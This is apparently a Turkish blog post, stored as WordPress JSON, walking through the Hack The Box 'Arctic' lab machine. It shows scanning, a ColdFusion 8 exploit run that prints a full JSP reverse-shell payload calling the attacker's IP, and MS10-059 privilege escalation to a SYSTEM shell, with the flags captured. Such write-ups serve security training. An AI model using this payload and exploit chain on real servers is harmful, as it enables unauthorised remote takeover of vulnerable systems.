{"id":1442,"date":"2021-07-30T15:22:24","date_gmt":"2021-07-30T15:22:24","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1442"},"modified":"2021-07-30T15:22:24","modified_gmt":"2021-07-30T15:22:24","slug":"arctic","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/30\/arctic\/","title":{"rendered":"Arctic"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/Arctic\/\" title=\"Arctic\">Arctic<\/a> - HTB<\/td>\n<td>Kolay<\/td>\n<td>Windows<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/0d6275efbd5e48fcdc96e61b9724ae5e.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>Nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">Starting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-30 10:50 EDT\nNmap scan report for 10.10.10.11\nHost is up (0.11s latency).\nNot shown: 65532 filtered ports\nPORT      STATE SERVICE VERSION\n135\/tcp   open  msrpc   Microsoft Windows RPC\n8500\/tcp  open  fmtp?\n49154\/tcp open  msrpc   Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose|phone|specialized\nRunning (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)\nOS CPE: cpe:\/o:microsoft:windows_8 cpe:\/o:microsoft:windows cpe:\/o:microsoft:windows_server_2008:r2 cpe:\/o:microsoft:windows_7 cpe:\/o:microsoft:windows_8.1 cpe:\/o:microsoft:windows_vista::- cpe:\/o:microsoft:windows_vista::sp1 cpe:\/o:microsoft:windows_server_2012\nAggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nTRACEROUTE (using port 135\/tcp)\nHOP RTT       ADDRESS\n1   113.67 ms 10.10.14.1\n2   114.05 ms 10.10.10.11\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 295.43 seconds\n<\/code><\/pre>\n<p>Ke\u015fif esnas\u0131nda 8500 da bir web servis oldu\u011funu anlad\u0131m ve <strong><a href=\"http:\/\/10.10.10.11:8500\/CFIDE\/administrator\/\">http:\/\/10.10.10.11:8500\/CFIDE\/administrator\/<\/a><\/strong> adresini buldum. Burada <strong>Adobe ColdFusion 8<\/strong> y\u00fckl\u00fcyd\u00fc ve public exploit aramaya ba\u015flad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Arctic]\n\u2514\u2500# searchsploit Adobe ColdFusion 8\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nAdobe ColdFusion - &#039;probe.cfm&#039; Cross-Site Scripting                                                                                                                                                         | cfm\/webapps\/36067.txt\nAdobe ColdFusion - Directory Traversal                                                                                                                                                                      | multiple\/remote\/14641.py\nAdobe ColdFusion - Directory Traversal (Metasploit)                                                                                                                                                         | multiple\/remote\/16985.rb\nAdobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution                                                                                                                 | windows\/remote\/43993.py\nAdobe ColdFusion 2018 - Arbitrary File Upload                                                                                                                                                               | multiple\/webapps\/45979.txt\nAdobe ColdFusion 8 - Remote Command Execution (RCE)                                                                                                                                                         | cfm\/webapps\/50057.py\nAdobe ColdFusion 9 - Administrative Authentication Bypass                                                                                                                                                   | windows\/webapps\/27755.txt\nAdobe ColdFusion &lt; 11 Update 10 - XML External Entity Injection                                                                                                                                             | multiple\/webapps\/40346.py\nAdobe ColdFusion Server 8.0.1 - &#039;\/administrator\/enter.cfm&#039; Query String Cross-Site Scripting                                                                                                                | cfm\/webapps\/33170.txt\nAdobe ColdFusion Server 8.0.1 - &#039;\/wizards\/common\/_authenticatewizarduser.cfm&#039; Query String Cross-Site Scripting                                                                                             | cfm\/webapps\/33167.txt\nAdobe ColdFusion Server 8.0.1 - &#039;\/wizards\/common\/_logintowizard.cfm&#039; Query String Cross-Site Scripting                                                                                                      | cfm\/webapps\/33169.txt\nAdobe ColdFusion Server 8.0.1 - &#039;administrator\/logviewer\/searchlog.cfm?startRow&#039; Cross-Site Scripting                                                                                                       | cfm\/webapps\/33168.txt\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Arctic]\n\u2514\u2500# searchsploit -m cfm\/webapps\/50057.py      \n  Exploit: Adobe ColdFusion 8 - Remote Command Execution (RCE)\n      URL: https:\/\/www.exploit-db.com\/exploits\/50057\n     Path: \/usr\/share\/exploitdb\/exploits\/cfm\/webapps\/50057.py\nFile Type: Python script, ASCII text executable, with CRLF line terminators\n\nCopied to: \/root\/oscp\/htb\/Arctic\/50057.py\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Arctic]\n\u2514\u2500# mv 50057.py test.py     <\/code><\/pre>\n<p>H\u0131zl\u0131 bir \u015fekilde reverse ald\u0131m. Tabi ki exploiti d\u00fczenlemek gerekiyor.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Arctic]\n\u2514\u2500# python3 test.py\n\nGenerating a payload...\nPayload size: 1497 bytes\nSaved as: 5c1a50e3599744dbb93487ef66df6ca0.jsp\n\nPriting request...\nContent-type: multipart\/form-data; boundary=0ab4521095f64da49aee949fadb8a194\nContent-length: 1698\n\n--0ab4521095f64da49aee949fadb8a194\nContent-Disposition: form-data; name=&quot;newfile&quot;; filename=&quot;5c1a50e3599744dbb93487ef66df6ca0.txt&quot;\nContent-Type: text\/plain\n\n&lt;%@page import=&quot;java.lang.*&quot;%&gt;\n&lt;%@page import=&quot;java.util.*&quot;%&gt;\n&lt;%@page import=&quot;java.io.*&quot;%&gt;\n&lt;%@page import=&quot;java.net.*&quot;%&gt;\n\n&lt;%\n  class StreamConnector extends Thread\n  {\n    InputStream hh;\n    OutputStream gm;\n\n    StreamConnector( InputStream hh, OutputStream gm )\n    {\n      this.hh = hh;\n      this.gm = gm;\n    }\n\n    public void run()\n    {\n      BufferedReader bw  = null;\n      BufferedWriter seb = null;\n      try\n      {\n        bw  = new BufferedReader( new InputStreamReader( this.hh ) );\n        seb = new BufferedWriter( new OutputStreamWriter( this.gm ) );\n        char buffer[] = new char[8192];\n        int length;\n        while( ( length = bw.read( buffer, 0, buffer.length ) ) &gt; 0 )\n        {\n          seb.write( buffer, 0, length );\n          seb.flush();\n        }\n      } catch( Exception e ){}\n      try\n      {\n        if( bw != null )\n          bw.close();\n        if( seb != null )\n          seb.close();\n      } catch( Exception e ){}\n    }\n  }\n\n  try\n  {\n    String ShellPath;\nif (System.getProperty(&quot;os.name&quot;).toLowerCase().indexOf(&quot;windows&quot;) == -1) {\n  ShellPath = new String(&quot;\/bin\/sh&quot;);\n} else {\n  ShellPath = new String(&quot;cmd.exe&quot;);\n}\n\n    Socket socket = new Socket( &quot;10.10.14.13&quot;, 4444 );\n    Process process = Runtime.getRuntime().exec( ShellPath );\n    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();\n    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();\n  } catch( Exception e ) {}\n%&gt;\n\n--0ab4521095f64da49aee949fadb8a194--\n\nSending request and printing response...\n\n        &lt;script type=&quot;text\/javascript&quot;&gt;\n            window.parent.OnUploadCompleted( 0, &quot;\/userfiles\/file\/5c1a50e3599744dbb93487ef66df6ca0.jsp\/5c1a50e3599744dbb93487ef66df6ca0.txt&quot;, &quot;5c1a50e3599744dbb93487ef66df6ca0.txt&quot;, &quot;0&quot; );\n        &lt;\/script&gt;\n\nPrinting some information for debugging...\nlhost: 10.10.14.13\nlport: 4444\nrhost: 10.10.10.11\nrport: 8500\npayload: 5c1a50e3599744dbb93487ef66df6ca0.jsp\n\nDeleting the payload...\n\nListening for connection...\n\nExecuting the payload...\nlistening on [any] 4444 ...\nconnect to [10.10.14.13] from (UNKNOWN) [10.10.10.11] 49199\n\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\n\nC:\\ColdFusion8\\runtime\\bin&gt;<\/code><\/pre>\n<p>\u0130lf flagi okudum.<\/p>\n<pre><code class=\"language-sh\">C:\\ColdFusion8\\runtime\\bin&gt;whoami\nwhoami\narctic\\tolis\n\nC:\\ColdFusion8\\runtime\\bin&gt;cd C:\\\ncd C:\\\n\nC:\\&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is F88F-4EA5\n\n Directory of C:\\\n\n22\/03\/2017  09:35 \ufffd\ufffd       381.971.784 coldfusion-801-win64.exe\n22\/03\/2017  09:55 \ufffd\ufffd    &lt;DIR&gt;          ColdFusion8\n22\/03\/2017  01:45 \ufffd\ufffd       454.528.976 ColdFusion_9_WWE_win64.exe\n07\/11\/2007  09:00 \ufffd\ufffd            17.734 eula.1028.txt\n07\/11\/2007  09:00 \ufffd\ufffd            17.734 eula.1031.txt\n07\/11\/2007  09:00 \ufffd\ufffd            10.134 eula.1033.txt\n07\/11\/2007  09:00 \ufffd\ufffd            17.734 eula.1036.txt\n07\/11\/2007  09:00 \ufffd\ufffd            17.734 eula.1040.txt\n07\/11\/2007  09:00 \ufffd\ufffd               118 eula.1041.txt\n07\/11\/2007  09:00 \ufffd\ufffd            17.734 eula.1042.txt\n07\/11\/2007  09:00 \ufffd\ufffd            17.734 eula.2052.txt\n07\/11\/2007  09:00 \ufffd\ufffd            17.734 eula.3082.txt\n07\/11\/2007  09:00 \ufffd\ufffd             1.110 globdata.ini\n07\/11\/2007  09:44 \ufffd\ufffd           855.040 install.exe\n07\/11\/2007  09:00 \ufffd\ufffd               843 install.ini\n07\/11\/2007  09:44 \ufffd\ufffd            75.280 install.res.1028.dll\n07\/11\/2007  09:44 \ufffd\ufffd            95.248 install.res.1031.dll\n07\/11\/2007  09:44 \ufffd\ufffd            90.128 install.res.1033.dll\n07\/11\/2007  09:44 \ufffd\ufffd            96.272 install.res.1036.dll\n07\/11\/2007  09:44 \ufffd\ufffd            94.224 install.res.1040.dll\n07\/11\/2007  09:44 \ufffd\ufffd            80.400 install.res.1041.dll\n07\/11\/2007  09:44 \ufffd\ufffd            78.864 install.res.1042.dll\n07\/11\/2007  09:44 \ufffd\ufffd            74.768 install.res.2052.dll\n07\/11\/2007  09:44 \ufffd\ufffd            95.248 install.res.3082.dll\n14\/07\/2009  06:20 \ufffd\ufffd    &lt;DIR&gt;          PerfLogs\n26\/12\/2017  01:13 \ufffd\ufffd    &lt;DIR&gt;          Program Files\n14\/07\/2009  08:06 \ufffd\ufffd    &lt;DIR&gt;          Program Files (x86)\n22\/03\/2017  10:00 \ufffd\ufffd    &lt;DIR&gt;          Users\n07\/11\/2007  09:00 \ufffd\ufffd             5.686 vcredist.bmp\n07\/11\/2007  09:50 \ufffd\ufffd         1.927.956 VC_RED.cab\n07\/11\/2007  09:53 \ufffd\ufffd           242.176 VC_RED.MSI\n09\/04\/2017  09:08 \ufffd\ufffd    &lt;DIR&gt;          Windows\n              26 File(s)    840.448.393 bytes\n               6 Dir(s)  33.194.209.280 bytes free\n\nC:\\&gt;cd Users\ncd Users\n\nC:\\Users&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is F88F-4EA5\n\n Directory of C:\\Users\n\n22\/03\/2017  10:00 \ufffd\ufffd    &lt;DIR&gt;          .\n22\/03\/2017  10:00 \ufffd\ufffd    &lt;DIR&gt;          ..\n22\/03\/2017  09:10 \ufffd\ufffd    &lt;DIR&gt;          Administrator\n14\/07\/2009  07:57 \ufffd\ufffd    &lt;DIR&gt;          Public\n22\/03\/2017  10:00 \ufffd\ufffd    &lt;DIR&gt;          tolis\n               0 File(s)              0 bytes\n               5 Dir(s)  33.194.209.280 bytes free\n\nC:\\Users&gt;cd tolis\ncd tolis\n\nC:\\Users\\tolis&gt;cd Desktop\ncd Desktop\n\nC:\\Users\\tolis\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is F88F-4EA5\n\n Directory of C:\\Users\\tolis\\Desktop\n\n22\/03\/2017  10:00 \ufffd\ufffd    &lt;DIR&gt;          .\n22\/03\/2017  10:00 \ufffd\ufffd    &lt;DIR&gt;          ..\n22\/03\/2017  10:01 \ufffd\ufffd                32 user.txt\n               1 File(s)             32 bytes\n               2 Dir(s)  33.194.209.280 bytes free\n\nC:\\Users\\tolis\\Desktop&gt;type user.txt\ntype user.txt\n02650d3a69a70780c302e146a6cb96f3\nC:\\Users\\tolis\\Desktop&gt;\n<\/code><\/pre>\n<p>Windows exploit suggester \u00e7al\u0131\u015ft\u0131rd\u0131m ve g\u00fcncel zafiyetlerden yararland\u0131m.<\/p>\n<pre><code class=\"language-sh\">C:\\ColdFusion8\\runtime\\bin&gt;cmd.exe \/c systeminfo\ncmd.exe \/c systeminfo\n\nHost Name:                 ARCTIC\nOS Name:                   Microsoft Windows Server 2008 R2 Standard \nOS Version:                6.1.7600 N\/A Build 7600\nOS Manufacturer:           Microsoft Corporation\nOS Configuration:          Standalone Server\nOS Build Type:             Multiprocessor Free\nRegistered Owner:          Windows User\nRegistered Organization:   \nProduct ID:                55041-507-9857321-84451\nOriginal Install Date:     22\/3\/2017, 11:09:45 \ufffd\ufffd\nSystem Boot Time:          1\/8\/2021, 12:40:26 \ufffd\ufffd\nSystem Manufacturer:       VMware, Inc.\nSystem Model:              VMware Virtual Platform\nSystem Type:               x64-based PC\nProcessor(s):              2 Processor(s) Installed.\n                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz\n                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz\nBIOS Version:              Phoenix Technologies LTD 6.00, 12\/12\/2018\nWindows Directory:         C:\\Windows\nSystem Directory:          C:\\Windows\\system32\nBoot Device:               \\Device\\HarddiskVolume1\nSystem Locale:             el;Greek\nInput Locale:              en-us;English (United States)\nTime Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul\nTotal Physical Memory:     1.023 MB\nAvailable Physical Memory: 277 MB\nVirtual Memory: Max Size:  2.047 MB\nVirtual Memory: Available: 1.222 MB\nVirtual Memory: In Use:    825 MB\nPage File Location(s):     C:\\pagefile.sys\nDomain:                    HTB\nLogon Server:              N\/A\nHotfix(s):                 N\/A\nNetwork Card(s):           1 NIC(s) Installed.\n                           [01]: Intel(R) PRO\/1000 MT Network Connection\n                                 Connection Name: Local Area Connection\n                                 DHCP Enabled:    No\n                                 IP address(es)\n                                 [01]: 10.10.10.11\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Arctic]\n\u2514\u2500# python2 \/root\/tool\/Windows-Exploit-Suggester\/windows-exploit-suggester.py -i systeminfo -d \/root\/tool\/Windows-Exploit-Suggester\/2021-07-28-mssb.xls | tee windows-exploit-suggester\n[*] initiating winsploit version 3.3...\n[*] database file detected as xls or xlsx based on extension\n[*] attempting to read from the systeminfo input file\n[+] systeminfo input file read successfully (utf-8)\n[*] querying database file for potential vulnerabilities\n[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits\n[*] there are now 197 remaining vulns\n[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin\n[+] windows version identified as &#039;Windows 2008 R2 64-bit&#039;\n[*] \n[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical\n[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important\n[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical\n[*]   http:\/\/www.exploit-db.com\/exploits\/35273\/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP &amp; EMET 5., PoC\n[*]   http:\/\/www.exploit-db.com\/exploits\/34815\/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP &amp; EMET 5.0 Bypass (MS12-037), PoC\n[*] \n[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important\n[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important\n[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical\n[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important\n[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important\n[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical\n[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical\n[*] done\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Arctic]\n\u2514\u2500# cat windows-exploit-suggester | grep Privilege\n[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important\n[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important\n[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important\n[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important\n[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important\n<\/code><\/pre>\n<p>S\u0131rayla exploitleri denemeye ba\u015flad\u0131m. En son a\u015fa\u011f\u0131daki exploit ba\u015far\u0131l\u0131 oldu.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Arctic]\n\u2514\u2500# wget https:\/\/github.com\/SecWiki\/windows-kernel-exploits\/raw\/master\/MS10-059\/MS10-059.exe\n--2021-07-30 10:47:46--  https:\/\/github.com\/SecWiki\/windows-kernel-exploits\/raw\/master\/MS10-059\/MS10-059.exe\nResolving github.com (github.com)... 140.82.121.3\nConnecting to github.com (github.com)|140.82.121.3|:443... connected.\nHTTP request sent, awaiting response... 302 Found\nLocation: https:\/\/raw.githubusercontent.com\/SecWiki\/windows-kernel-exploits\/master\/MS10-059\/MS10-059.exe [following]\n--2021-07-30 10:47:47--  https:\/\/raw.githubusercontent.com\/SecWiki\/windows-kernel-exploits\/master\/MS10-059\/MS10-059.exe\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 784384 (766K) [application\/octet-stream]\nSaving to: \u2018MS10-059.exe\u2019\n\nMS10-059.exe                                                100%[=========================================================================================================================================&gt;] 766.00K   248KB\/s    in 3.1s    \n\n2021-07-30 10:47:51 (248 KB\/s) - \u2018MS10-059.exe\u2019 saved [784384\/784384]\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\nC:\\Temp&gt;whoami\nwhoami\narctic\\tolis\n\nC:\\Temp&gt;copy \\\\10.10.14.13\\KUDAY\\MS10-059.exe .\ncopy \\\\10.10.14.13\\KUDAY\\MS10-059.exe .\n        1 file(s) copied.\n\nC:\\Temp&gt;MS10-059.exe\nMS10-059.exe\n\/Chimichurri\/--&gt;This exploit gives you a Local System shell &lt;BR&gt;\/Chimichurri\/--&gt;Usage: Chimichurri.exe ipaddress port &lt;BR&gt;\nC:\\Temp&gt;MS10-059.exe 10.10.14.13 80\nMS10-059.exe 10.10.14.13 80\n\/Chimichurri\/--&gt;This exploit gives you a Local System shell &lt;BR&gt;\/Chimichurri\/--&gt;Changing registry values...&lt;BR&gt;\/Chimichurri\/--&gt;Got SYSTEM token...&lt;BR&gt;\/Chimichurri\/--&gt;Running reverse shell...&lt;BR&gt;\/Chimichurri\/--&gt;Restoring default registry values...&lt;BR&gt;\nC:\\Temp&gt;\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Arctic]\n\u2514\u2500# nc -lvp 80                  \nlistening on [any] 80 ...\nwhoami\n10.10.10.11: inverse host lookup failed: Unknown host\nconnect to [10.10.14.13] from (UNKNOWN) [10.10.10.11] 49478\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\n\nC:\\Temp&gt;whoami\nnt authority\\system\n\nC:\\Temp&gt;cd C:\\Users\\Administrator\\Desktop\ncd C:\\Users\\Administrator\\Desktop\n\nC:\\Users\\Administrator\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is F88F-4EA5\n\n Directory of C:\\Users\\Administrator\\Desktop\n\n22\/03\/2017  10:02 \ufffd\ufffd    &lt;DIR&gt;          .\n22\/03\/2017  10:02 \ufffd\ufffd    &lt;DIR&gt;          ..\n22\/03\/2017  10:02 \ufffd\ufffd                32 root.txt\n               1 File(s)             32 bytes\n               2 Dir(s)  33.192.198.144 bytes free\n\nC:\\Users\\Administrator\\Desktop&gt;type root.txt\ntype root.txt\nce65ceee66b2b5ebaff07e50508ffb90\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Arctic &#8211; HTB Kolay Windows Walkthrough Nmap taramas\u0131 ile ba\u015flayal\u0131m. Starting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-30 10:50 EDT&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/30\/arctic\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Arctic<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498,468],"tags":[587,579],"class_list":["post-1442","post","type-post","status-publish","format-standard","hentry","category-walkthrough","category-windows","tag-adobe-coldfusion-8","tag-ms10-059","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1442","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1442"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1442\/revisions"}],"predecessor-version":[{"id":1443,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1442\/revisions\/1443"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1442"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1442"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1442"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}